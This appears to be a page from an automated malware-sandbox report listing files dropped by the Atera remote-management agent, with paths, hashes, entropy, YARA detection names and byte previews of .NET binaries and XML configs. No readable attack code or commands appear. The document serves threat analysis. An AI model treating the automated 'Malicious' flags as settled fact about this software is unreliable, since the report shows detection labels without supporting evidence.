                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):19496
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.523503501017087
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:TyPa16oAL4D+wW9IWmDIW4IWYDa9Nyb8E9VF6IYijSJIVxFXao3O:TWs6oqDjADKeDa5EpYi60t3O
                                                                                                                                                                                                                                                                                              MD5:5CCE0A003A3B4E3FCB05AD331737A629
                                                                                                                                                                                                                                                                                              SHA1:F227F3D440B87FF6CA1DFCB05DB858422B6FB586
                                                                                                                                                                                                                                                                                              SHA-256:98195B6ADD5D1B7357CF9CEACBC47180934050CD1F1CDC30D728CAF933F1F94D
                                                                                                                                                                                                                                                                                              SHA-512:4A210A5ED4F406D7350DDBB9EE969F93F1CA3168A8034661927297319D778FEF95434E4C6D8981FDD17573C42DE013F7C765A39D9EFF8557932547DE47061C6E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0.............b2... ...@....... ..............................P[....@..................................2..O....@...............$..((...`......x1............................................... ............... ..H............text...h.... ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................B2......H........!..T....................0......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2r[..p.(....*B.....(.........*.BSJB............v4.0.30319......l...4...#~..........#Strings....t.......#US.@.......

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingNotifications.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):41512
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.408720053739074
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:ejfAw5tisE7Mkvwtwq6uUQ/B0X5tl9wCVjkz3pVS3Upoztj9FgNyb8E9VF6IYij/:eksE74GX7nwOa5VS2ozd9FYEpYi60F
                                                                                                                                                                                                                                                                                              MD5:7ADB4990E3417E540A8BA94265B3BB05
                                                                                                                                                                                                                                                                                              SHA1:DC9040A3E3DBA544C34ECF8B709C41479390061C
                                                                                                                                                                                                                                                                                              SHA-256:776D914F78177BE94DBCAC47AD3E9D97D9E31208F474A828540EE60E695C3577
                                                                                                                                                                                                                                                                                              SHA-512:8EAEBE99366B7428281B1C0D87030C17E726E8B5D239F00DD29FFAA6F95C27FF443206488B6D08108663B6290F5421CD2BE34BA978BA6E4D94AA2F4CF197761A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...6Rig.........."...0..n..........r.... ........@.. ..............................;.....`................................. ...O....................z..((.......................................................... ............... ..H............text...xm... ...n.................. ..`.rsrc................p..............@..@.reloc...............x..............@..B................T.......H........!...............1..@Z............................................(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....rY..p~....o....t....*.~....*..(....*Vs....(....t.........*.(.....(....(......,....s....o....*(....*.0..........(....o ...rm..p(!...(".....'...%.. .o#......i./..|s$......)...(.......(%....)...o&.......o'......i.0..+....o(......i.0..+....o)......i....+....o*...s+....o,.....,..(-.....&..*..................0..........(.... ....`(/.....&.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingNotifications.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1547
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.008195800038022
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JdsIOvPF7NhOXrRH2/dVxlPH2/FVQ7uH2/FVruH2/+mV0PH2/+w39y:3sIk7O7RgdjdgFSagFgg+msg+w3w
                                                                                                                                                                                                                                                                                              MD5:029F543956E8B235A70112C77912150A
                                                                                                                                                                                                                                                                                              SHA1:8F8916C78D9D3E5F92C37BDD39D34CD3B79BECA6
                                                                                                                                                                                                                                                                                              SHA-256:33720B1985FE3F07F13744963085FA641F452EC393C3C8987A6023D0BC493BD1
                                                                                                                                                                                                                                                                                              SHA-512:CF6EF25E7FD7E0B04A4F76B1552621874DAAA43838D0C028E62D1AABFFCD57AC7086A174BE9D5AF283DE8E8F09B5B40505478978102A1D8351681532B3828A38
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):78888
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.073747946605879
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:zEgQIe8mLShsE0EGB3GsoTcvlYksQf761:zleyi5ErsoTcvPsQfe
                                                                                                                                                                                                                                                                                              MD5:41697838D5D0D8EDA1411C981C9B29A5
                                                                                                                                                                                                                                                                                              SHA1:6895F922F9EAE7C86C44A123F68BA4047C8E84C2
                                                                                                                                                                                                                                                                                              SHA-256:308EB6E0401D6C30DCB17A1740A9F83197E1A82EE3B885BEBE9D840B6110DC18
                                                                                                                                                                                                                                                                                              SHA-512:C6031B6038D9EBF5A623C482EE034473D54001EF233AE4DBDE9F6AF5C52BDA29FC517B7959D4FCDFD0379AE89C4B60E5E10C6DB434A2B9E44918E4B266AE26AE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.]..........." ..0..............!... ...@....... ..............................DO....`.................................Q!..O....@..................((...`....... ..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................!......H........X...............................................................0..........(....(.....r...p... .....r...p..(......o......(.....o......(.....o..........s......[o......s....%.o........o .....s!..........s"...%......io#...o$.....o%...(&.........,...o'......*......y.,........0..........(....(.....r...p... .....r...p..(......o......(.....o.......((.........s......[o......s....%.o........o).......s*..........s"......i.k...........io+.....(.........o,.........,...o'......*.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):953
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.9874198404771155
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JduPF7NhOXrRH2/dVxlPH2/FVQ7uH2/F9y:327O7RgdjdgFSagFw
                                                                                                                                                                                                                                                                                              MD5:8C9F9547ABA4CD154FAA858695986C4E
                                                                                                                                                                                                                                                                                              SHA1:667630B8AEA31C20C20EE569983B73028F0DBA21
                                                                                                                                                                                                                                                                                              SHA-256:7DE06E53089587194D3669B5F2050B363CC2AC1BC66F0537EC4D7AD94357D46F
                                                                                                                                                                                                                                                                                              SHA-512:C305E923A197E2C39813D423FE50D94F183E932BCC66DBEE5667AD7F4083254D50510E35ED3603555FEB4C42F580C8A1FA3D1568CC7305D22B79AB406607F836
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTray.exe (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):350760
                                                                                                                                                                                                                                                                                              Entropy (8bit):2.90589251015886
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:4O11JSb/jb5LEH8VAynnnnnnnnnnnnnnn82Bw:e5W
                                                                                                                                                                                                                                                                                              MD5:7A4CBB0228E97071A39E075AC95186E2
                                                                                                                                                                                                                                                                                              SHA1:3711A1F3F76428AEDC2647532575C37A1629AC2A
                                                                                                                                                                                                                                                                                              SHA-256:373437D726DD953113E193FF4028C77AA462BC8EAB53E4F770889746652C3958
                                                                                                                                                                                                                                                                                              SHA-512:EBD2DBE33B6346D020BCE651664B903D31BAFBA4968F8EE8983E38C9EFF8EEA928364D7406945258CF35E805580B125160D061510F16F95900C3CFB276F11EC0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...9Rig.........."...0......d......>.... ........@.. ..............................%{....`.....................................O........a...........2..((........................................................... ............... ..H............text...D.... ...................... ..`.rsrc....a.......b..................@..@.reloc...............0..............@..B................ .......H........*...%..........TP..`............................................0............,t.....r...p(....-..r...p(....-..r...p(....-)+G(....(.....p...(....,.(....+*(.....X...(......,..(.... ....(....+..8...s.........(.... ....`(.......(....rA..p(....rQ..p.%-.&.+.o....(....(......r]..pry..p(....( ...(....,......(....,......(!....("...(#....o$..........s%...(&...(....%(....('...r]..pr...p(....( ...((...s)........~....(*...r]..pr...p(....( ...((....C..r...p(....(+...((...(....rA..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTray.exe.config (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1786
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.998101412964689
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:3sIk7O7RgdjdgFSagFgg+msg+w3Zg+wBw:8TizwzH
                                                                                                                                                                                                                                                                                              MD5:DACBD4EDD0163701F63ADA3E81D8540E
                                                                                                                                                                                                                                                                                              SHA1:219647896B3575AA8A07E2903D50304919C27CA7
                                                                                                                                                                                                                                                                                              SHA-256:DF0FBC7B2A5449681549C81B7EB77B2CE8D3C0C62244C39442A73A0291124BCB
                                                                                                                                                                                                                                                                                              SHA-512:5C725DEE661DF9FFE6D3723606FAF98F0B16094DAFC011CDE062436B351671E952A2C6CFA218E08785DBC2E69E97EC8218E1447683C1450C5BF9CCDC75C2EA73
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTrayTMP.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):350760
                                                                                                                                                                                                                                                                                              Entropy (8bit):2.90589251015886
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:4O11JSb/jb5LEH8VAynnnnnnnnnnnnnnn82Bw:e5W
                                                                                                                                                                                                                                                                                              MD5:7A4CBB0228E97071A39E075AC95186E2
                                                                                                                                                                                                                                                                                              SHA1:3711A1F3F76428AEDC2647532575C37A1629AC2A
                                                                                                                                                                                                                                                                                              SHA-256:373437D726DD953113E193FF4028C77AA462BC8EAB53E4F770889746652C3958
                                                                                                                                                                                                                                                                                              SHA-512:EBD2DBE33B6346D020BCE651664B903D31BAFBA4968F8EE8983E38C9EFF8EEA928364D7406945258CF35E805580B125160D061510F16F95900C3CFB276F11EC0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...9Rig.........."...0......d......>.... ........@.. ..............................%{....`.....................................O........a...........2..((........................................................... ............... ..H............text...D.... ...................... ..`.rsrc....a.......b..................@..@.reloc...............0..............@..B................ .......H........*...%..........TP..`............................................0............,t.....r...p(....-..r...p(....-..r...p(....-)+G(....(.....p...(....,.(....+*(.....X...(......,..(.... ....(....+..8...s.........(.... ....`(.......(....rA..p(....rQ..p.%-.&.+.o....(....(......r]..pry..p(....( ...(....,......(....,......(!....("...(#....o$..........s%...(&...(....%(....('...r]..pr...p(....( ...((...s)........~....(*...r]..pr...p(....( ...((....C..r...p(....(+...((...(....rA..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTrayTMP.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1786
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.998101412964689
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:3sIk7O7RgdjdgFSagFgg+msg+w3Zg+wBw:8TizwzH
                                                                                                                                                                                                                                                                                              MD5:DACBD4EDD0163701F63ADA3E81D8540E
                                                                                                                                                                                                                                                                                              SHA1:219647896B3575AA8A07E2903D50304919C27CA7
                                                                                                                                                                                                                                                                                              SHA-256:DF0FBC7B2A5449681549C81B7EB77B2CE8D3C0C62244C39442A73A0291124BCB
                                                                                                                                                                                                                                                                                              SHA-512:5C725DEE661DF9FFE6D3723606FAF98F0B16094DAFC011CDE062436B351671E952A2C6CFA218E08785DBC2E69E97EC8218E1447683C1450C5BF9CCDC75C2EA73
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):59944
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.1324471704124885
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:Q6O442hHI1kIHLxnuFjBm+UuLcxVePk+CXVT+rB9ezGREpYi60j1W:Q6O4JuxnT+UuLMcBClyrvGGa76x
                                                                                                                                                                                                                                                                                              MD5:FCE223AEDBE5FDFD5D1AF1F407A7E457
                                                                                                                                                                                                                                                                                              SHA1:006331AAFD0898E17D7F873F81786DFFAD1171FB
                                                                                                                                                                                                                                                                                              SHA-256:F4AE472EF2A816DD53F9A08A7E4C2604470FAD1C9F570BD6BBCA2E2EE7D31AE5
                                                                                                                                                                                                                                                                                              SHA-512:3B6D1F6A844FB90BBEDDBAC9CBEE9BBD6B9E0E737E8DEBD3647AF20982B2D61622E708D7555800A15C1BE874BBBC2476A8F775B7D60F58E14C8798E925C202C6
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ........... ....................... ............`.................................m...O.......................((..............8............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........X..0.............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..s....}.....s....}.....(......o8...(...+}....*..0...........{....o.....8......(.....s.......}E.....u....}D....{D...,........s....(....&+ms.......}G.....u....}F....{F...,........s....(....&+8s.........}I......u....}H.....{H...,.........s....(....&..(....:J.............o.....*.................0..I........{....o.....{....o.....+...(

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1191
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.971943087661362
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JduPF7NhOXrRH2/dVQ7uH2/FVxlPH2/FV0PH2/+w39y:327O7RgdSagFjdgFsg+w3w
                                                                                                                                                                                                                                                                                              MD5:B8E88B1C181AFEB535BFEA1155000E8E
                                                                                                                                                                                                                                                                                              SHA1:EB9066E96542DCE5F35DBF2F1424FD79ACEBB65F
                                                                                                                                                                                                                                                                                              SHA-256:5D094CC46FED5173A2B1BE4C8E5DBDB658D2C14ABD367C47DFC6F6EABD5F295C
                                                                                                                                                                                                                                                                                              SHA-512:58459651D3358FDDD4114AB569786A2306338C08D27D3D449BE2084EAE9D4A619C5650D3699DCA6702AEFDE8F9E77FD9E56C87EF51D4A8CCB2A22A378C488C37
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\t2tWinFormAppBarLib.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):23080
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.4987430748917925
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:8LOGTOwM15TRwLm6or29Nyb8E9VF6IYijSJIVxyy1So:8nMTR0Pa25EpYi60H
                                                                                                                                                                                                                                                                                              MD5:78E552CDB4CB2B0DE7A1CEF209C90CE0
                                                                                                                                                                                                                                                                                              SHA1:26CA5C6511B224CF02BB1C0DC1B4579C268E4B30
                                                                                                                                                                                                                                                                                              SHA-256:0FF7666BB20911A83680B6C1FF02341A503B347AE020434997580F5B2F2C29A2
                                                                                                                                                                                                                                                                                              SHA-512:9D0FE6D3580B5D5CBA458CBF6C4AEDE62C3DD107D72A13805F605AC0674AB6130B669AAA4E96069C64F24523C7477BBA575C813011E2443108B7DCE33268004C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\.\.........." ..0..(...........G... ...`....... ..............................&D....`..................................F..O....`..L............2..((...........E............................................... ............... ..H............text...4'... ...(.................. ..`.rsrc...L....`.......*..............@..@.reloc...............0..............@..B.................G......H........)..$............................................................~....*.......**...(.....*...0...........~.....o......,..~.....o......+i.s(...%.o.....%.o.....%.o.....%.o.....%.o....o ....%.o....o"....%.o....o$....%.o....o&.....~......o........+..*..0............(.......o....o.......o%...o................o!......(....}.......o!......(....}.......o!......(.....o#.......(....X}.......o!......(.....o#.......(....X}..............s..........%..o.....#....%........o ...&*...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\x64\SQLite.Interop.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1817640
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.551365167856295
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:49152:d9EeNSPwEW3cFSI4Tfm3hvbHsjAJcAMkPR:d9Nzm31PMoR
                                                                                                                                                                                                                                                                                              MD5:0E488B8F6A93F0148C1CD10588FA3BE1
                                                                                                                                                                                                                                                                                              SHA1:4480B6DE0CE67A9DFC4CF70BBB00C8336629BBA7
                                                                                                                                                                                                                                                                                              SHA-256:BFC17FCA01C65C1E5B32ED0225B354D9613764A3A51DF5B1C464031608D97179
                                                                                                                                                                                                                                                                                              SHA-512:5D48FC54948C4FB80E0C506554F140476CEB6901BC9A1D11A577C2C6293415C1F69DE420E36E8840BDD8B5372F45A4DC8E2BBAC5CE21643A497CE77D925826EE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
